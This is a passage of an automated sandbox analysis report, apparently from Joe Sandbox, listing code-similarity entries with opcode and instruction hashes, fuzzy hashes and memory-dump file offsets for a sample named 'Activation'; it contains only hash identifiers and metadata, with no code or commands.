                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 990d09bc5e3f6740e1f2fea0974c77445f9e13d0af02c5c1a5693928bcc9f797
                                                                                        • Instruction ID: 00fd091a1ad752661ca5d3613748a2af73c4cbe55911eaa08b72db61e9266945
                                                                                        • Opcode Fuzzy Hash: 990d09bc5e3f6740e1f2fea0974c77445f9e13d0af02c5c1a5693928bcc9f797
                                                                                        • Instruction Fuzzy Hash: 3E41D331A112088FDB15EBB8D894AADBBF2FF88750F148569D10AE7350DF309C01CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4dfa52d940dbb2900f78c40aa0f1d490536f22f7bf336204d0c8f5aef63935a7
                                                                                        • Instruction ID: cf08a4ba5cea837fee66fcdce833d9758f58c7611cabfd2102d046cac5d5f1b6
                                                                                        • Opcode Fuzzy Hash: 4dfa52d940dbb2900f78c40aa0f1d490536f22f7bf336204d0c8f5aef63935a7
                                                                                        • Instruction Fuzzy Hash: 1D416E30B112098FDB44EFB8D595AAEB7F2FF89310B248569D109AB341DF31AD06CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3008d37211f090b7f8793af39a29e1b03118b130eb03b07472000870724ed197
                                                                                        • Instruction ID: 86786ad6d1323980f996632c6e24567a733b2040a0b4157f5ce1be28d7f2b890
                                                                                        • Opcode Fuzzy Hash: 3008d37211f090b7f8793af39a29e1b03118b130eb03b07472000870724ed197
                                                                                        • Instruction Fuzzy Hash: 23515E75A00209CFCB54DF69D5849AABBF5FF88310B14C66AE809EB345DB74E944CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4904a0a03db47cb1a98b933ae35547f4bf8d7c54eca3cde5de97420aa5c4dc28
                                                                                        • Instruction ID: aa0d1ef33ef5b4b35bfb797304f088a4bb1ff8f337e1daa0078fb1bb5f77cb81
                                                                                        • Opcode Fuzzy Hash: 4904a0a03db47cb1a98b933ae35547f4bf8d7c54eca3cde5de97420aa5c4dc28
                                                                                        • Instruction Fuzzy Hash: F1517038A51204DFCB88DF69D498E6DB7B2FF89715B658498E4069B371CB70ED42CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ee083d6587ae54e16923e542c99f581fc3320e79a847caf435019afc1f11be2
                                                                                        • Instruction ID: 92da754702c42e62b2e348db8481870e262fa20faa08b92f79d00a18c3330f9c
                                                                                        • Opcode Fuzzy Hash: 9ee083d6587ae54e16923e542c99f581fc3320e79a847caf435019afc1f11be2
                                                                                        • Instruction Fuzzy Hash: 63410D71A10219DBDF04DFA8C990AEDB7F6BF88300F148569E505BB344EB71AD46CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff19846caf04692705a9efb4f6b1d57c6fe0d09b93958d46b4c0bec8f6aa1218
                                                                                        • Instruction ID: 523f2dafe1e514a6315cb33721eb1555018f58757a23a3fbc9021caa66663e64
                                                                                        • Opcode Fuzzy Hash: ff19846caf04692705a9efb4f6b1d57c6fe0d09b93958d46b4c0bec8f6aa1218
                                                                                        • Instruction Fuzzy Hash: A8410E71A10209DBDB04DFA5C890AEEBBF6FF88310F148569E405BB344DB71AD45CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b83201a9b339c8ab0dcbc7f600bddc9f0987c249b5e3749bdc34e65dab02578
                                                                                        • Instruction ID: 4d7fee4ec4d7c800eee59fce5a29111dedcb8edb91ed1a37fdb7471852bcef9d
                                                                                        • Opcode Fuzzy Hash: 1b83201a9b339c8ab0dcbc7f600bddc9f0987c249b5e3749bdc34e65dab02578
                                                                                        • Instruction Fuzzy Hash: 3441A275B002098BDB04DBA8E981AAEB3E2FFC4310714857AD519DB301EF31ED1A8791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 37ec72d85166b1608bb5db43f849977fafc3c53c556c18ad998c57dcc4693923
                                                                                        • Instruction ID: cc0469f2cb84062020a288e2708d02712c3b6cba9c8dbe456e23003ad18262bb
                                                                                        • Opcode Fuzzy Hash: 37ec72d85166b1608bb5db43f849977fafc3c53c556c18ad998c57dcc4693923
                                                                                        • Instruction Fuzzy Hash: 4E414C71A01218DFEB44EB64D855AAEBBB6EF89310F20806DE409A7391DF305E46DF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 87d38f3e0bb2a18b4977008d5f6a70edbc0944b9be708c749c1f95a9d43770c4
                                                                                        • Instruction ID: 95c6040bc6714545b3ccc1beb7eaf2c34c277149383c8f4455898912fdfe354d
                                                                                        • Opcode Fuzzy Hash: 87d38f3e0bb2a18b4977008d5f6a70edbc0944b9be708c749c1f95a9d43770c4
                                                                                        • Instruction Fuzzy Hash: 60317E31B002108FCF48E77C949972E36E2AF88714B654169F419EB396EE34DD0257D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a2cdbe69f57969e09b569ebfb48d9fa96b6479350e5e1e8e626fd83da5d30a24
                                                                                        • Instruction ID: a1613ef64b06f032d9a63f486aa355b8da3e4625fc8d04ebe39d2ba4eecac2aa
                                                                                        • Opcode Fuzzy Hash: a2cdbe69f57969e09b569ebfb48d9fa96b6479350e5e1e8e626fd83da5d30a24
                                                                                        • Instruction Fuzzy Hash: E6418B30B00208DBDB14DB69E999BADB7F2FF89700B20812ED006AB350DF759D06CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 874241c7f5e3e8c70c20f078d05868d074debbf23add985f6fdc57fedfbe4136
                                                                                        • Instruction ID: 28493c74b88588da9c36af5c542d09311bea74edf5311af379b62dcf995ce119
                                                                                        • Opcode Fuzzy Hash: 874241c7f5e3e8c70c20f078d05868d074debbf23add985f6fdc57fedfbe4136
                                                                                        • Instruction Fuzzy Hash: DD41B578A50204DFDB84DF69D498E9DBBB2FF49714B258099E5069B3B2CB70ED42CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0a016a0656c7bf603c1555dfc9026af02b5633986c4def994ab5030f9bcc786
                                                                                        • Instruction ID: 6795cebf30e3434d208bef49a38439539991643e19eb62e1396987e0141d7459
                                                                                        • Opcode Fuzzy Hash: a0a016a0656c7bf603c1555dfc9026af02b5633986c4def994ab5030f9bcc786
                                                                                        • Instruction Fuzzy Hash: ED4112B1D0034D9FDF10CFA9C888ADEBFF5AF49310F14802AE819AB254DB759945CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7eb8719765faa0bbdd985ef928db60b7ebf215af934c567cab8e4ebf0be09cce
                                                                                        • Instruction ID: dee1e4aa0eea6f717edf3123cbb0a5215bb384163ff542e50fd28884bac114be
                                                                                        • Opcode Fuzzy Hash: 7eb8719765faa0bbdd985ef928db60b7ebf215af934c567cab8e4ebf0be09cce
                                                                                        • Instruction Fuzzy Hash: 56316A30B00209DBDB14DBA9E995BADB7E2FF89700B24856ED006AB350DF759D06CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6879190739eb480717621dddb055a492537c278fdc9117c1c90ea8562905e074
                                                                                        • Instruction ID: a9f7fb9e44893a3d505ac2505cd3e6f3fb480d9c9c2df4bf107199690f9ca052
                                                                                        • Opcode Fuzzy Hash: 6879190739eb480717621dddb055a492537c278fdc9117c1c90ea8562905e074
                                                                                        • Instruction Fuzzy Hash: 954145B1D10658CFDF20CFA9C88979EBBF1AF58300F14852AE825A7344DBB49946CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5769250f892bee9ac41e2d5abe70f9a071689f6a7fb3281748041838b813be5c
                                                                                        • Instruction ID: 308c97ef19ac6c8ebb296a72bc765ea5afd33e3b5958a5c62d5b8259091f7383
                                                                                        • Opcode Fuzzy Hash: 5769250f892bee9ac41e2d5abe70f9a071689f6a7fb3281748041838b813be5c
                                                                                        • Instruction Fuzzy Hash: 683146B1D007588FDF10CFA9C88979EBBF1AF48710F14852AE825A7344DBB49946CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fbfd9600c56897b7ad6354b09603ddf46c51ab42091d41979eb5ea2c1d4f3fe
                                                                                        • Instruction ID: e8ea72028fc66a6c9692e8a3aeb74efd0cdad7a9c4f2d9d7a93584efd4dff132
                                                                                        • Opcode Fuzzy Hash: 3fbfd9600c56897b7ad6354b09603ddf46c51ab42091d41979eb5ea2c1d4f3fe
                                                                                        • Instruction Fuzzy Hash: 2741EFB1D0034D9FDF10CF99C889ADEBBB5AF48310F248029E819AB254DB75A945CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8225a36f7e679fcf5eea777d8924280f26788e1922ddd932ca4e91ec825aa4c5
                                                                                        • Instruction ID: 84a2fc4996f5ada077174310c976489c0bd05530bd8f02143429716849b03a65
                                                                                        • Opcode Fuzzy Hash: 8225a36f7e679fcf5eea777d8924280f26788e1922ddd932ca4e91ec825aa4c5
                                                                                        • Instruction Fuzzy Hash: F1210E327106104BCB04E7BCE85966E73E2EFC5761B59847AE20ADB382EE35DD0693D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a92a6f407313f937f89be25ec2ab55aa391e14c4d441483a134f19003d71d292
                                                                                        • Instruction ID: d8b633495fa867e576ef3393849782eb53b7ba4380a6aabde502b7969da2f1b5
                                                                                        • Opcode Fuzzy Hash: a92a6f407313f937f89be25ec2ab55aa391e14c4d441483a134f19003d71d292
                                                                                        • Instruction Fuzzy Hash: 37214B30704209CFDB14AB74D49966E3BF2BB8A351F280468D506EB3A1EF71CC42DB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b044c44001568d604bc43fcdb435b4e03989a4104b85cd7616c05275811e4875
                                                                                        • Instruction ID: 0d1c56a9ea3df290f3a1bea321c21c9c391d439a49f0b5b8482ab7dadda04e98
                                                                                        • Opcode Fuzzy Hash: b044c44001568d604bc43fcdb435b4e03989a4104b85cd7616c05275811e4875
                                                                                        • Instruction Fuzzy Hash: 9421BF31B052088FDB45EB75D9647AE7BB2AF8A315F15006CD101EB3A2DF348C41CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 352cbd8d332f689ef1fd25f2f8f0865298df1360b6181087ab3d8c6c466a6df7
                                                                                        • Instruction ID: b525abdf3cfff8ca20ddf47a026a72809afbbde00bd660d0bdcf36d4564ad0c3
                                                                                        • Opcode Fuzzy Hash: 352cbd8d332f689ef1fd25f2f8f0865298df1360b6181087ab3d8c6c466a6df7
                                                                                        • Instruction Fuzzy Hash: FB31C2B5D002599FDF00CFA9D488BEEBBB5FF48314F14842AE918A7250D7749A55CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 01e8370fad4a2ec4661da7b893f88a1c79e8cf263ca422a21dcc6e4e05e8450d
                                                                                        • Instruction ID: f5ab774601b8125d13c44755865a546e73bacc6b17b5a8fb1d26f8010b3ca822
                                                                                        • Opcode Fuzzy Hash: 01e8370fad4a2ec4661da7b893f88a1c79e8cf263ca422a21dcc6e4e05e8450d
                                                                                        • Instruction Fuzzy Hash: C7218E36B01105DFDB44EB68E895D6EB7B1EFC9320B20803AE509E7341DE31AD02DB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26e30ac7cad4bdadc6c1a796239fb237f930a13ebbe983d7f9077c97e0a4004f
                                                                                        • Instruction ID: 586f4fc939804ef8a690ae0b2081b1d3f8ea9a6935e44b4e0e8f4910b4ff19fb
                                                                                        • Opcode Fuzzy Hash: 26e30ac7cad4bdadc6c1a796239fb237f930a13ebbe983d7f9077c97e0a4004f
                                                                                        • Instruction Fuzzy Hash: 9731C2B5D0021D9FDB00CFAAD888BDEFBB4FB48314F14842AE918A7250D7749A55CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65124ed76bb4c82eacf6f99e72030667ae8039312cf227a3a551495a48aafeec
                                                                                        • Instruction ID: e68773fe9626a6ed161d2ed90ac0b619fb58da31ca45f4d938c8b86eacb0c6a4
                                                                                        • Opcode Fuzzy Hash: 65124ed76bb4c82eacf6f99e72030667ae8039312cf227a3a551495a48aafeec
                                                                                        • Instruction Fuzzy Hash: EC219031B101158FDB44EB78D8A466E77E6FB85750B508078D51AD3391EF34DC06D7A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f934c4bd63dd198412c91e78a720a7173dd471568e9ca2d4887a9a0d9538981
                                                                                        • Instruction ID: de130f8c1d7387a1eea5b91e77f3413ce1656454597e70c398416a3636d6eaf6
                                                                                        • Opcode Fuzzy Hash: 1f934c4bd63dd198412c91e78a720a7173dd471568e9ca2d4887a9a0d9538981
                                                                                        • Instruction Fuzzy Hash: 6221CD31B001158FDB44EB78D8A8A6E7BE6FB89750B508078D51AD3390EF34DC06EBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4cd2e21ea621a2a39b171568380cbb6037547485d7699498548aa96a85be146
                                                                                        • Instruction ID: 34ff396fa3f1174ed431b7bb968d707c5a0678a8f2ca026e718ddb1f0ddde313
                                                                                        • Opcode Fuzzy Hash: b4cd2e21ea621a2a39b171568380cbb6037547485d7699498548aa96a85be146
                                                                                        • Instruction Fuzzy Hash: 0721D471504344DFDB04DF94D5C4B26BB65FB84314F24C5ADD80A4B296C776DC46CA62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1647696098.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c0d000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ee955c3bfb440deae0a604e18e702a6d6d5a8a5a072512b10fffd3724f381e80
                                                                                        • Instruction ID: 60550cb39c9771599d7fec62dad23d4c47dddfcf087d1624b3a0ba4cc911610a
                                                                                        • Opcode Fuzzy Hash: ee955c3bfb440deae0a604e18e702a6d6d5a8a5a072512b10fffd3724f381e80
                                                                                        • Instruction Fuzzy Hash: 2B21F375604344EFDB10DF54D9C0B2ABB65FB84328F34C569D90A4B2C6C73AD846CAA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dae1bb9395433edf6a74166a0194402e8242c05912e04dcf6a08505576afdc16
                                                                                        • Instruction ID: d5a3f2772998854bb798a97a76de78425cdc767832163742906146d2719680b7
                                                                                        • Opcode Fuzzy Hash: dae1bb9395433edf6a74166a0194402e8242c05912e04dcf6a08505576afdc16
                                                                                        • Instruction Fuzzy Hash: 14213730A00209DBDF14DFA9E999BADB7B1FF89304B20816ED406AB350DF759D06CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d5e2b1a8b4414edd2e5f747e3abb52effd38967b1ec634d5b569e172bcaf483
                                                                                        • Instruction ID: 7e2ba2be870dac3a869bbd0f3cf8b11dbd9ffcb394e4f4281827675182b0b015
                                                                                        • Opcode Fuzzy Hash: 2d5e2b1a8b4414edd2e5f747e3abb52effd38967b1ec634d5b569e172bcaf483
                                                                                        • Instruction Fuzzy Hash: 9821D530F0421A4FDB05AB7998152BF7BB6DFC6211F10416AD909E7280EF314D468791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6faa602f755c229574bd0e27103f4546eae4347a8b4c74b3d2fea153ff080d3c
                                                                                        • Instruction ID: bad33fd3847e654ce74efa567ff15d128de0078a37d3a18c07aa0ee651f259af
                                                                                        • Opcode Fuzzy Hash: 6faa602f755c229574bd0e27103f4546eae4347a8b4c74b3d2fea153ff080d3c
                                                                                        • Instruction Fuzzy Hash: 15217931B002188FDB84EB79D5647AE7BF6AF8D215F24042CE102AB3A1DF349C41CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b4bad51c7f303876a26f0392b8f303ea0d6db47b6232ef1622b4fc2786a0595
                                                                                        • Instruction ID: 7eb7855719d8257d21bc11aa1e89bccfe166414d19a4bd79dccaa42248d80548
                                                                                        • Opcode Fuzzy Hash: 6b4bad51c7f303876a26f0392b8f303ea0d6db47b6232ef1622b4fc2786a0595
                                                                                        • Instruction Fuzzy Hash: 71217271B00108DFCF41DFADD9859AEBBF5FBC8710B10802AE519E7211DB319D159BA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e1387d03366dc56437a33326a9497a3e9fa6b38c57ea363c9b8bc24d9ccce30
                                                                                        • Instruction ID: c278163514cba0d4ec4c566ee469f41c87bf277dd6cf591cce37f7d5a7fe4bf3
                                                                                        • Opcode Fuzzy Hash: 2e1387d03366dc56437a33326a9497a3e9fa6b38c57ea363c9b8bc24d9ccce30
                                                                                        • Instruction Fuzzy Hash: 2B110331B012468FDF15DBB4D8646BE7BB1EF82714B1045BAD009E7142DF345E0AC7A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 340136337c116f7c21b8a85c145681506f3e1a30af909f318418202931da1a2e
                                                                                        • Instruction ID: 4fa2da0b22a5cb9cc25e89eabd9294d3944685a4e47d87f0a12ff264c98455c6
                                                                                        • Opcode Fuzzy Hash: 340136337c116f7c21b8a85c145681506f3e1a30af909f318418202931da1a2e
                                                                                        • Instruction Fuzzy Hash: 9A219A34A01219CFDB98EB75C9587AE76F2AF8D305F200528E006AB3A1EF359C01CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12fa74754463213f45142624d571ed57678c4b7496a53d8f9d4fe3034545a98b
                                                                                        • Instruction ID: aab23cd3d3e822b0a6dcfc50ea7c762c4ab01e93d2e3751d2d49c97b9ff56b86
                                                                                        • Opcode Fuzzy Hash: 12fa74754463213f45142624d571ed57678c4b7496a53d8f9d4fe3034545a98b
                                                                                        • Instruction Fuzzy Hash: 0621DEB8AA13489FF7069B21E45AA2D7B66F788355F80842AF9618B3C4DF7D4C01CF10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d8e5cbe71f7c769c1fff6fd8b9e375d1681a6f0c259dbe7634d7359cb947801
                                                                                        • Instruction ID: 6a6f673c518091bde5399128d0534a244ee9cae74dc7e8fcba2f71c372529de6
                                                                                        • Opcode Fuzzy Hash: 5d8e5cbe71f7c769c1fff6fd8b9e375d1681a6f0c259dbe7634d7359cb947801
                                                                                        • Instruction Fuzzy Hash: 1C11D6227401144FDB49F3BDA86167E22E7ABC6660B69407AD009CB3D5DE648C0363E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
